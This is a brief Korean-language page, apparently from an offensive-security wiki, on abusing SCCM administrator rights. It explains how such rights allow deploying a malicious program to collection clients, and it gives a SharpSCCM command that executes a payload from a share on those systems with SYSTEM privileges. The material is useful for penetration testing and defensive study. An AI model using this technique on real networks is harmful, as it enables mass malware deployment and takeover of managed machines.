Application Admin

SCCM 서버에 Full Administrator / Application Administrator 권한이 있다면 악성 프로그램을 컬렉션 클라이언트를 대상으로 배포시킬 수 있습니다.

프로그램 실행 명령시 클라이언트의 시스템에 접속 중인 사용자 세션으로 실행되며, 만약 로그인 하지 않은 시스템의 경우 명령은 실행되지 않습니다.

# 공유 폴더에 페이로드 업로드 후 컬렉션 시스템의 시스템 권한으로 실행
.\SharpSCCM.exe exec -n '<collection>' -p '<share-path>' --no-banner -s

Demo

PreviousAuto approvalNextAdd RBAC Admins

Last updated